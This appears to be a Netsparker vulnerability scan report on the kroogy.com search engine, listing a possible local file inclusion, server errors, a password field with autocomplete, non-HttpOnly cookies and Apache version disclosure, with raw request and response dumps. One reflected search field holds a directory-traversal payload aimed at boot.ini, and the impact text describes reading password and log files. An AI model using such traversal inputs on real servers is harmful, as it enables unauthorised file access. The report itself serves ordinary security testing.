'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft"> </td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright"> </td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft"> </td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="../../../../../../../../../../boot.ini" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td> </td><td> </td></tr></table></td><td class="searchtdright"> </td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">4,580,000</span> இல் <span class="resultcountstart">11</span>-<span class="resultcountend">20</span> முடிவுகள்</span></td> <td class="typesearchtd" align="right"><span class="typesearchtext">தேடு வலை</span></td> </tr> </table> </td> </tr><tr>..
[Possible] Local File Inclusion
[Possible] Local File Inclusion
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into attacked server page.
Impact
Impact can differ based on the exploitation and the read permission of the web server user. Depends on these factors an attacker might carry out one or more of the following attacks:
Gather usernames via /etc/password
file
Harvest useful information from the log files such as "/apache/logs/error.log"
or "/apache/logs/access.log"
Remotely execute commands via combining this vulnerability with some of other attack vectors such as file upload vulnerability or log injection.
If it's possible, do not accept appending file paths directly. Make it hard-coded or selectable from a limited hard-coded path list via an index variable
If you definitely need dynamic path concatenation, ensure that you only accept required characters such as "a-Z0-9" and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
Finally it's important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure that any potential attack can not perform a directory traversal attack.
- /search/web/Linkbucks%20vlad%20modelS
fopen(.tmpfiles/<b>linkbucks</b>com/gallery-<b>vlad</b><b>models</b>) [function.fopen]: failed to open stream:
Request
GET /search/web/Linkbucks%20vlad%20modelS HTTP/1.1 Referer: http://kroogy.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:34:49 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Vary: Accept-Encoding Content-Encoding: Content-Length: 11414 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - Linkbucks vlad modelS</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - Linkbucks vlad modelS"><meta name="keywords" content="Kroogy Search,search,search engine,Linkbucks vlad modelS,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > பெருவிரல்சுவடை காமி <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!--.totaltd { border-bottom:#045c97; border-bottom-style:solid; border-bottom-width:1px; background-color:#e4f2fc; height:20px; padding-left:10px; padding-right:10px; } .typesearchtd { border-bottom:#045c97; border-bottom-style:solid; border-bottom-width:1px; background-color:#e4f2fc; height:20px; padding-left:10px; padding-right:10px; } .conversiontable { width:100%; } .conversiontd { padding-left:10px; padding-right:10px; padding-bottom:20px; } .conversionkeyword { font-size:18px; font-style:italic; } .conversiontarget { font-size:18px; font-style:italic; } .viewmorelinktd { padding-bottom:15px; } .viewmorelink { font-size:12px; } .showimagetd { padding-bottom:5px; } .imagepreviewlinkweb { font-size:12px; } .resultcountstart { font-size:13px; font-weight:bold; } .resultcountend { font-size:13px; font-weight:bold; } .totalresults { font-size:13px; font-weight:bold; } .keywordintotal { font-size:13px; font-weight:bold; } .thumbshotimage { border: 1px solid black; } .outermaincontainer { align:center; width:100%; } .outermainresulttd { vertical-align:top; width:850px; padding:10px; } outermainimageresulttd { vertical-align:top; width:100%; padding:10px; } .totaltable { width:100%; height:30px; padding-left:0px; font-family:Verdana, Arial, Helvetica, sans-serif; } .totaltext { font-size:12px; } .typesearchtext { text-transform: capitalize; font-size:12px; font-weight:bold; } .spelltable { height:30px; width:100%; font-family:Verdana, Arial, Helvetica, sans-serif; padding:20px; } .spellsuggestiontext { padding-left:10px; padding-right:10px; font-size:13px; font-weight:bold; } .spelllink { font-weight:bold; font-size:13px; color:green; } .resultsetwrapper { width:100%; } .resultsetwrappertd { } .resulttable { width:100%; } .thumbshotimage { width:100px; heigth:100px; } .resulttd { width:100%; valign:top; font-family:Verdana, Arial, Helvetica, sans-serif; } .resulttitle { font-size:13px; valign:top; font-family:verdana,Arial, Helvetica, sans-serif; } .resulttitle a:hover { color:red; } .resultlink { } .newwindowimage { width:11px; height:11px; } .resultdescription { font-size:11px; } .resulturl { font-size:12px; color:green; } .emailfrndlink { font-size:12px; } .seperationtd { height:10px; } .footerpagetable { width:100%; } .relatedkeywordstable { width:100%; } .footerpagetd a { text-decoration:none; font-size:14px; color:#0368ab; border-style:solid; border-width:1px; border-color:#a4d7fa; padding-left:8px; padding-right:8px; padding-top:2px; padding-bottom:2px; font-family:Arial, Helvetica, sans-serif; } .footerpagetd a:hover { text-decoration:none; font-size:14px; color:#fff; border-style:solid; border-width:1px; border-color:#a4d7fa; padding-left:8px; padding-right:8px; padding-top:2px; padding-bottom:2px; background-color:#0368ab; } .footerpagetext { font-size:15px; color:black; font-weight:bold; } .footerpagetd { padding:10px; height:40px; } .relatedkeywordstd { height:40px; padding-left:10px; padding-right:10px; font-family:Verdana, Arial, Helvetica, sans-serif; } .relatedkeywordmessage { font-size:12px; font-weight:bold; } .relatedkeywordlink { font-size:12px; font-weight:bold; } .imagedomain { font-size:10px; color:green; line-height:15px; } .imagedetails { font-size:10px; line-height:15px; font } .imagetitle { font-size:11px; line-height:25px; } .imagepreview { font-size:11px; } .imageresulttd { padding-left:10px; padding-bottom:15px; padding-right:10px; font-family:Verdana; } .videoresulttd { padding-bottom:15px; padding-left:10px; padding-right:10px; font-family:Verdana; } .videotitle { font-size:11px; line-height:20px; font-weight:bold; } .videoduration { font-size:10px; color:green; line-height:15px; } .videopublishedon { font-size:10px; line-height:15px; } .thumbshottd { padding-bottom:5px; padding-right:10px; vertical-align:top; padding-left:10px; } .imageresultsinwebtd { padding-left:10px; vertical-align:bottom; } .imageresultinweb { border: 1px solid black; max-height:80px; } .imageresultinwebviewmorelink { font-size:12px; font-weight:bold; } .arithmeticconversiontd { padding-left:10px; padding-right:10px; padding-top:10px; font-size:14px; font-weight:bold; } .qlook { font-size:12px; } .emaillinkimage { width:12px; height:12px; } .arithmeticconversionkeyword { font-size:16px; font-weight:bold; } .arithmeticcoversionresult { font-size:16px; font-weight:bold; } .noresulttext { font-size:12px; font-weight:bold; } .noresulttd { padding-top:15px; padding-left:15px; align-text:center; padding-right:15px; } .quicklooktd { padding-left:10px; } .imageresultinwebviewmorelinktd { padding-bottom:15px; padding-left:10px; padding-right:10px; } .outermainadtd { padding-top:20px; padding-left:10px; padding-right:10px; vertical-align:top; } .amazonnavigationoptiontext { font-size:12px; font-weight:bold; } .amazoncountrytd { padding-top:10px; } .amazoncategorytd { padding-top:10px; } .ebaythumbshotimage { border: 1px solid black; width:80px; } .amazonthumbshotimage { width:55px; border: 1px solid black; } .box { background-color: #F0F8FF; } .border { border-left-color: #d3e1f9; border-right-color: #d3e1f9; }/* CSS Document */ .body td, tr { font-family:Verdana, Arial, Helvetica, sans-serif; } #countries,#optionallanguage,#themegroup { background-color:#e4f2fc; height:22px; border-width:1px; border-style:solid; Border-color:#aaaaaa; } .advancedsearchsubtitletd { padding-bottom:15px; padding-top:10px; padding-left:5px; padding-right:5px; } .advancedsearchtexttd { width:250px; padding-left:5px; height:40px; padding-right:5px; } .advancedsearchfieldtd { padding-bottom:15px; } .advancedsearchtextstyle { font-size:12px; } .advancedsearchtable { width:700px; margin-top:10px; padding-top:5px; padding-bottom:15px; } .advancedsearchexampletext { font-size:12px; } .advancedsearchtitletable { width:700px; margin-top:20px; background-color:#e1e1e1; padding-top:15px; padding-bottom:15px; } .advancedsearchtitletd { padding-left:5px; height:30px; text-align:center; background-color:#e4f2fc; width:100%; border:#045c97; border-style: solid; border-width: 1px; } .advancedsearchsubtitletext { font-size:12px; font-weight:bold; } .footertable { width:100%; padding-top:15px; } .footertext { font-size:12px; } .footertd { padding-left:10px; } .headerlinkstd { width:100%; padding-right:5px; padding-left:5px; padding-top:2px; font-size:13px; padding-bottom:2px; border-bottom:#045c97; background-color: #e4f2fc; border-bottom-style: solid; border-bottom-width: 1px; } .headerlinkstd a ,.headerlinkstd a:visited { color:#000000; font-weight:bold; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; } .languagetd { padding-left:5px; font-size:12px; height:30px; } .headerlink { font-size:12px; } .themetd { padding-left:5px; padding-top:2px; font-size:13px; padding-bottom:2px; border-bottom:#045c97; background-color: #e4f2fc; border-bottom-style: solid; border-bottom-width: 1px; color:#000; } .cloudtagtd { margin-top:20px; padding-top:5px; padding-left:5px; border-color:#77c3fa; border-width:1px; border-style:solid; padding-bottom:5px; padding-left:5px; padding-right:5px; } .cloudtagtd a { font-family:Verdana, Arial, Helvetica, sans-serif; } .generallinks { font-size:12px; } .opendirectorytd { padding-top:10px; } .advancetd { height:20px; padding-left:5px; font-size:13px; } .footerlinktd { height:15px; border-top: #045c97; padding-top:5px; border-top-style: solid; border-top-width: 1px; } .stdpagetitle { font-size:14px; font-weight:bold; } .emailafrndurltd , .emaillinkdesctd { padding-top;5px; background-color:#e4f2fc; padding-bottom:5px; } .emailafrndurl { font-size:12px; font-weight:bold; } .outermainoptionstd { padding-left:15px; padding-right:15px; padding-top:5px; padding-bottom:5px; font-size:12px; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } .outermainlogotd { width:5%; padding-top:5px; padding-bottom:5px; padding-left:15px; padding-right:15px; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } .outermaintabtd { padding-top:10px; padding-bottom:5px; padding-left:0px; padding-right:0px; vertical-align:bottom; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } #mandatory { color:red; font-size:10px; font-weight:bold; vertical-align:top; padding-left:2px; padding-right:2px; } #morelanguagesdiv { font-size:11px; } .advancetd a { font-size:11px; } .generatesearchboxtable { width:900px; margin-top:10px; padding-top:5px; padding-bottom:15px; } .generatesearchboxtitletd { padding-left:5px; height:30px; text-align:center; background-color:#e4f2fc; width:100%; border:#045c97; border-style: solid; border-width: 1px; } .generatesearchboxpagetitle { font-size:14px; font-weight:bold; } .generatesearchboxtexttd { padding-left:5px; height:40px; padding-right:5px; } .generatesearchboxtextstyle { font-size:12px; } .generatesearchboxsubtitletd { padding-bottom:15px; padding-top:10px; padding-left:5px; padding-right:5px; } .generatesearchboxsubtitletext { font-size:12px; font-weight:bold; } .generatesearchboxenginestextstyle { font-size:12px; text-transform: capitalize; } -->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementByI..
Internal Server Error
Internal Server Error
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.
Impact
The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.
Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /search/www.ecokids.ca/pub/eco_info/topics/climate/adaptations/
Request
GET /search/www.ecokids.ca/pub/eco_info/topics/climate/adaptations/ HTTP/1.1 Referer: http://kroogy.com/search/www.ecokids.ca/pub/eco_info/topics/climate/adaptations/index.cfm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8; region=BE-nl; PHPSESSID=totjukp6oqa5l5opadu8gndj05 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error Date: Sun, 24 Apr 2011 12:45:03 GMT Server: Apache/2.2.3 (CentOS) Vary: Accept-Encoding Content-Encoding: Content-Length: 452 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, root@loft7620.serverloft.eu and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.2.3 (CentOS) Server at kroogy.com Port 80</address></body></html>
Auto Complete Enabled
Auto Complete Enabled
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.
Add the attribute autocomplete="off"
to the form tag or to individual "input" fields.
Actions to Take
See the remedy for the solution.
Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References
PASSWORD
Request
GET /pub/ HTTP/1.1 Referer: http://kroogy.com/pub/banner_728_90_random.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8; region=BE-nl Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:35:26 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Set-Cookie: PHPSESSID=totjukp6oqa5l5opadu8gndj05; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: Content-Length: 440 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Start Page</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link rel="stylesheet" type="text/css" href="Colorful.css" /></head><body><h3 align="center">Please select a table to work with</h3> <table align="center" cellpadding="2" cellspacing="2"> <form action="login.php" method="post"> <tr><td>Username </td><td><input type="text" name="USERNAME"></td></tr> <tr><td>Password </td><td><input type="password" name="PASSWORD"></td></tr> <tr><td> </td><td><input type="submit" name="ACTION" value="Login"</td></tr> </form> </table>
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.
Actions to Take
See the remedy for solution
Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as
XSS Tunnel to bypass HTTPOnly protection.
External References
language
Request
GET /index.php?languageid= HTTP/1.1 Referer: http://kroogy.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 302 Found Date: Sun, 24 Apr 2011 12:34:33 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Cache-Control: no-transform Vary: User-Agent,Accept,Accept-Encoding Set-Cookie: language=deleted; expires=Sat, 24-Apr-2010 12:34:32 GMT location: http://kroogy.com/ Content-Encoding: Content-Length: 20 Connection: close Content-Type: text/html
Apache Version Disclosure
Apache Version Disclosure
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.
Impact
An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.
Configure your web server to prevent information leakage from the SERVER
header of its HTTP response.
2.2.3 (CentOS)
Request
GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Accept-Encoding: gzip, deflate
Response
